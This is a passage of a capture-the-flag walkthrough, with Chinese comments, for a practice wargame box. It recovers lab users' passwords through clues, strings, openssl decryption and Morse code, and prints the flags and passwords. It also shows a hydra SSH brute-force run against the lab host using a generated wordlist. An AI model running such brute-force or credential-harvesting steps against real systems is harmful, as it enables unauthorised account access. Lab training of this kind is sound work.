nina@venus:~$ su -l kira Password: kira@venus:~$ ls -la total 32 drwxr-x--- 2 root kira 4096 Apr 5 06:27 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 kira kira 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 kira kira 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 kira kira 807 Apr 23 2023 .profile -rw-r----- 1 root kira 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root kira 191 Apr 5 06:27 mission.txt kira@venus:~$ cat flagz.txt 8===rJun2WyeuGIvabWQvJko===D~~ kira@venus:~$ cat mission.txt ################ # MISSION 31 # ################ ## EN ## The user veronica visits a lot http://localhost/waiting.php ## ES ## La usuaria veronica visita mucho http://localhost/waiting.php kira@venus:~$ curl -s -i http://localhost/waiting.php HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 30 Jun 2024 18:41:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Im waiting for the user-agent PARADISE. kira@venus:~$ curl -s -i http://localhost/waiting.php -A "PARADISE" HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 30 Jun 2024 18:41:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive QTOel6BodTx2cwX
32 veronica
kira@venus:~$ su -l veronica Password: veronica@venus:~$ ls -la total 32 drwxr-x--- 2 root veronica 4096 Apr 5 06:27 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 veronica veronica 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 veronica veronica 3559 Apr 5 06:28 .bashrc -rw-r--r-- 1 veronica veronica 807 Apr 23 2023 .profile -rw-r----- 1 root veronica 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root veronica 228 Apr 5 06:27 mission.txt veronica@venus:~$ cat flagz.txt 8===iSSeKzoDXsKy8WPuqNPg===D~~ veronica@venus:~$ cat mission.txt ################ # MISSION 0x32 # ################ ## EN ## The user veronica uses a lot the password from lana, so she created an alias. ## ES ## La usuaria veronica usa mucho la password de lana, asi que ha creado un alias. veronica@venus:~$ alias alias lanapass='UWbc0zNEVVops1v' alias ls='ls --color=auto'
33 lana
veronica@venus:~$ su -l lana Password: lana@venus:~$ ls -la total 44 drwxr-x--- 2 root lana 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 lana lana 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 lana lana 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 lana lana 807 Apr 23 2023 .profile -rw-r----- 1 root lana 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root lana 161 Apr 5 06:27 mission.txt -rw-r----- 1 root lana 10240 Apr 5 06:28 zip.gz lana@venus:~$ cat flagz.txt 8===um3Hno2AsjFjuLWsfmDj===D~~ lana@venus:~$ cat mission.txt ################ # MISSION 0x33 # ################ ## EN ## The user noa loves to compress her things. ## ES ## A la usuaria noa le gusta comprimir sus cosas. lana@venus:~$ gunzip -h Usage: gzip [OPTION]... [FILE]... Compress or uncompress FILEs (by default, compress FILES in-place). Mandatory arguments to long options are mandatory for short options too. -c, --stdout write on standard output, keep original files unchanged -d, --decompress decompress -f, --force force overwrite of output file and compress links -h, --help give this help -k, --keep keep (don't delete) input files -l, --list list compressed file contents -L, --license display software license -n, --no-name do not save or restore the original name and timestamp -N, --name save or restore the original name and timestamp -q, --quiet suppress all warnings -r, --recursive operate recursively on directories --rsyncable make rsync-friendly archive -S, --suffix=SUF use suffix SUF on compressed files --synchronous synchronous output (safer if system crashes, but slower) -t, --test test compressed file integrity -v, --verbose verbose mode -V, --version display version number -1, --fast compress faster -9, --best compress better With no FILE, or when FILE is -, read standard input. Report bugs to <bug-gzip@gnu.org>. lana@venus:~$ gunzip -d zip.gz gzip: zip.gz: not in gzip format lana@venus:~$ file zip.gz zip.gz: POSIX tar archive (GNU) lana@venus:~$ cat zip.gz pwned/lana/zip0000644000000000000000000000002014603715036012326 0ustar rootroot9WWOPoeJrq6ncvJ
34 noa
lana@venus:~$ su -l noa Password: noa@venus:~$ ls -la total 36 drwxr-x--- 2 root noa 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 noa noa 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 noa noa 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 noa noa 807 Apr 23 2023 .profile -rw-r----- 1 root noa 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root noa 159 Apr 5 06:27 mission.txt -rw-r----- 1 root noa 3818 Apr 5 06:28 trash noa@venus:~$ cat flagz.txt 8===HUNGevKdeKwcCvJru1CC===D~~ noa@venus:~$ cat mission.txt ################ # MISSION 0x34 # ################ ## EN ## The password of maia is surrounded by trash ## ES ## La password de maia esta rodeada de basura venus:~$ file trash trash: data noa@venus:~$ strings trash b;pK *&dv |.- wsG9 D55- \|gu 1q#^ YV!)} f}nP T735 5GOj' g3-5v)S~hK {Xu7 O;rTl, ]Bokc 04`0 X:Uf ;Vtr3 `vr) k` I <(;pQ @$LiJ u7TI *Q{r% ;%gzDB b%/* 3g?d =I+" xfFN \nh1hnDPHpydEjoEN ! 2L~8 JmN8 @%`j , ^, e&xvN2 _cKn .c|0 )|hd& hl(p fEr: OdBb ?OsP dnN9 J7e( JL6( wI;%vz apPD a5qi |otr 4TTm toyi *f|F .%J`t noa@venus:~$ strings trash | grep -E '^.{15,}$' \nh1hnDPHpydEjoEN
-E正则^行的开始.表示任意字符- {15,} 数量下限为 15
$行尾
35 maia
noa@venus:~$ su -l maia Password: maia@venus:~$ ls -la total 36 drwxr-x--- 2 root maia 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 maia maia 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 maia maia 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 maia maia 807 Apr 23 2023 .profile -rw-r----- 1 root maia 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root maia 16 Apr 5 06:28 forget -rw-r----- 1 root maia 317 Apr 5 06:27 mission.txt maia@venus:~$ cat flagz.txt 8===nu8IDScKFAXVcnFutKtG===D~~ maia@venus:~$ cat mission.txt ################ # MISSION 0x35 # ################ ## EN ## The user gloria has forgotten the last 2 characters of her password ... They only remember that they were 2 lowercase letters. ## ES ## La usuaria gloria ha olvidado los 2 ultimos caracteres de su password... Solo recuerdan que eran 2 letras minusculas. maia@venus:~$ cat forget v7xUVE2e5bjUc?? hgbe02@pwn:~/temp$ for a in {a..z}; do for b in {a..z}; do echo "v7xUVE2e5bjUc$a$b" >> pass; done; done hgbe02@pwn:~/temp$ head -n 20 pass v7xUVE2e5bjUcaa v7xUVE2e5bjUcab v7xUVE2e5bjUcac v7xUVE2e5bjUcad v7xUVE2e5bjUcae v7xUVE2e5bjUcaf v7xUVE2e5bjUcag v7xUVE2e5bjUcah v7xUVE2e5bjUcai v7xUVE2e5bjUcaj v7xUVE2e5bjUcak v7xUVE2e5bjUcal v7xUVE2e5bjUcam v7xUVE2e5bjUcan v7xUVE2e5bjUcao v7xUVE2e5bjUcap v7xUVE2e5bjUcaq v7xUVE2e5bjUcar v7xUVE2e5bjUcas v7xUVE2e5bjUcat hgbe02@pwn:~/temp$ hydra -l gloria -P pass ssh://venus.hackmyvm.eu:5000 Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-01 03:14:16 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 676 login tries (l:1/p:676), ~43 tries per task [DATA] attacking ssh://venus.hackmyvm.eu:5000/ [STATUS] 98.00 tries/min, 98 tries in 00:01h, 579 to do in 00:06h, 16 active [STATUS] 103.33 tries/min, 310 tries in 00:03h, 367 to do in 00:04h, 16 active [5000][ssh] host: venus.hackmyvm.eu login: gloria password: v7xUVE2e5bjUcxw [STATUS] 96.57 tries/min, 676 tries in 00:07h, 1 to do in 00:01h, 2 active 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-01 03:21:19
36 gloria
maia@venus:~$ su -l gloria Password: gloria@venus:~$ ls -la total 36 drwxr-x--- 2 root gloria 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 gloria gloria 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 gloria gloria 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 gloria gloria 807 Apr 23 2023 .profile -rw-r----- 1 root gloria 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root gloria 1713 Apr 5 06:28 image -rw-r----- 1 root gloria 222 Apr 5 06:27 mission.txt gloria@venus:~$ cat flagz.txt 8===RZIkEtaEp18tLslTopJj===D~~ gloria@venus:~$ cat mission.txt ################ # MISSION 0x36 # ################ ## EN ## User alora likes drawings, that's why she saved her password as ... ## ES ## A la usuaria alora le gustan los dibujos, por eso ha guardado su password como... gloria@venus:~$ file image image: ASCII text gloria@venus:~$ cat image ########################################################## ########################################################## ########################################################## ########################################################## ######## ########## ## ######## ######## ########## ## ## #### ########## ######## ######## ## ## ## ## ###### ## ## ######## ######## ## ## #### ######## ## ## ######## ######## ## ## ## #### ## ## ######## ######## ########## ## #### ########## ######## ######## ## ## ## ## ######## ######################## #### ########################## ######## ## #### #### ## ## ## ########## ############ ###### ## ## ## ######## ######## ## ## ## ## #### ## ######## ############## ## ## ###### ## #### ######## ############ ## ## ######## ## ## ########## ######################## #### ## ## #### ######## ######## ## #### ## ########## ######## ########## ###### ########## #### ########## ######## ## ## #### ## ###### ######## ######## ## ## ## ## ###### ## #### ######## ######## ## ## #### ## ## ## ######## ######## ########## ## #### ## ################## ######## ## ## ########## ########################################################## ########################################################## ########################################################## ##########################################################
拿微信扫一下得到密码:mhrTFCoxGoqUxtw
37 alora
gloria@venus:~$ su -l alora Password: alora@venus:~$ ls -la total 384 drwxr-x--- 2 root alora 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 alora alora 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 alora alora 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 alora alora 807 Apr 23 2023 .profile -rw-r----- 1 root alora 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root alora 176 Apr 5 06:27 mission.txt -rw-r----- 1 root alora 360448 Apr 5 06:28 music.iso alora@venus:~$ cat flagz.txt 8===NSe78N2lM7IbvHzvrC0G===D~~ alora@venus:~$ cat mission.txt ################ # MISSION 0x37 # ################ ## EN ## The user julie has created an iso with her password. ## ES ## La usuaria julie ha creado una iso con su password. alora@venus:~$ file music.iso music.iso: ISO 9660 CD-ROM filesystem data 'CDROM' alora@venus:~$ strings music.iso CD001 LINUX CDROM GENISOIMAGE ISO 9660/HFS FILESYSTEM CREATOR (C) 1993 E.YOUNGDALE (C) 1997-2006 J.PEARSON/J.SCHILLING (C) 2006-2007 CDRKIT TEAM 2024040506284600 2024040506284600 0000000000000000 2024040506284600 CD001 MUSIC.ZIP;1RR music.zipPX$ RRIP_1991ATHE ROCK RIDGE INTERCHANGE PROTOCOL PROVIDES SUPPORT FOR POSIX FILE SYSTEM SEMANTICSPLEASE CONTACT DISC PUBLISHER FOR SPECIFICATION SOURCE. SEE PUBLISHER IDENTIFIER IN PRIMARY VOLUME DESCRIPTOR FOR CONTACT INFORMATION. pwned/alora/music.txtUT sjDf4i2MSNgSvOv pwned/alora/music.txtUT
得到密码,尝试常规做法挂载试试:
alora@venus:~$ mkdir /tmp/temp_music alora@venus:~$ mount -o loop music.iso /tmp/temp_music mount: /tmp/temp_music: mount failed: Operation not permitted. alora@venus:~$ sudo mount -o loop music.iso /tmp/temp_music [sudo] password for alora: alora is not in the sudoers file. This incident has been reported to the administrator. # 传到本地机器中 hgbe02@pwn:~/temp$ mkdir /tmp/music hgbe02@pwn:~/temp$ sudo mount -o loop music.iso /tmp/music [sudo] password for hgbe02: mount: /tmp/music: WARNING: source write-protected, mounted read-only. hgbe02@pwn:~/temp$ unzip /tmp/music/music.zip -d tmp Archive: /tmp/music/music.zip extracting: tmp/pwned/alora/music.txt hgbe02@pwn:~/temp$ cat /tmp/pwned/a;ora/music.txt cat: /tmp/pwned/a: No such file or directory -bash: ora/music.txt: No such file or directory hgbe02@pwn:~/temp$ cat tmp/pwned/alora/music.txt sjDf4i2MSNgSvOv hgbe02@pwn:~/temp$ sudo umount /tmp/music
这里下载到本地,我是用的 termius,然后 SFTP 传过来的。
38 julie
alora@venus:~$ su -l julie Password: julie@venus:~$ ls -la total 48 drwxr-x--- 2 root julie 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 julie julie 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 julie julie 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 julie julie 807 Apr 23 2023 .profile -rw-r----- 1 root julie 4802 Apr 5 06:28 1.txt -rw-r----- 1 root julie 4802 Apr 5 06:28 2.txt -rw-r----- 1 root julie 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root julie 192 Apr 5 06:27 mission.txt julie@venus:~$ cat flagz.txt 8===Iwe1QpxTcx0A8Uusqjfe===D~~ julie@venus:~$ cat mission.txt ################ # MISSION 0x38 # ################ ## EN ## The user irene believes that the beauty is in the difference. ## ES ## La usuaria irene cree que en la diferencia esta lo bonito. julie@venus:~$ diff 1.txt 2.txt 174c174 < 8VeRLEFkBpe2DSD --- > aNHRdohjOiNizlU
俩都有可能,尝试一下是否可以进行切换。
39 irene
julie@venus:~$ su -l irene Password: irene@venus:~$ ls -la total 44 drwxr-x--- 2 root irene 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 irene irene 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 irene irene 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 irene irene 807 Apr 23 2023 .profile -rw-r----- 1 root irene 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root irene 1704 Apr 5 06:28 id_rsa.pem -rw-r----- 1 root irene 451 Apr 5 06:28 id_rsa.pub -rw-r----- 1 root irene 178 Apr 5 06:27 mission.txt -rw-r----- 1 root irene 256 Apr 5 06:28 pass.enc irene@venus:~$ cat flagz.txt 8===c9hgLkLGzsNw7mB3VEr4===D~~ irene@venus:~$ cat mission.txt ################ # MISSION 0x39 # ################ ## EN ## The user adela has lent her password to irene. ## ES ## La usuaria adela le ha dejado prestada su password a irene. irene@venus:~$ openssl pkeyutl -decrypt -inkey id_rsa.pem -in pass.enc nbhlQyKuaXGojHx
40 adela
irene@venus:~$ su -l adela Password: adela@venus:~$ ls -la total 36 drwxr-x--- 2 root adela 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 adela adela 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 adela adela 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 adela adela 807 Apr 23 2023 .profile -rw-r----- 1 root adela 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root adela 213 Apr 5 06:27 mission.txt -rw-r----- 1 root adela 44 Apr 5 06:28 wtf adela@venus:~$ cat flagz.txt 8===86XGXQefUeV2eEdrUzxx===D~~ adela@venus:~$ cat mission.txt ################ # MISSION 0x40 # ################ ## EN ## User sky has saved her password to something that can be listened to. ## ES ## La usuaria sky ha guardado su password en algo que puede ser escuchado. adela@venus:~$ cat wtf .--. .- .--. .- .--. .- .-. .- -.. .. ... .
使用 cyberchef 进行解密,是莫斯密码:PAPAPARADISE,小写即为 papaparadise
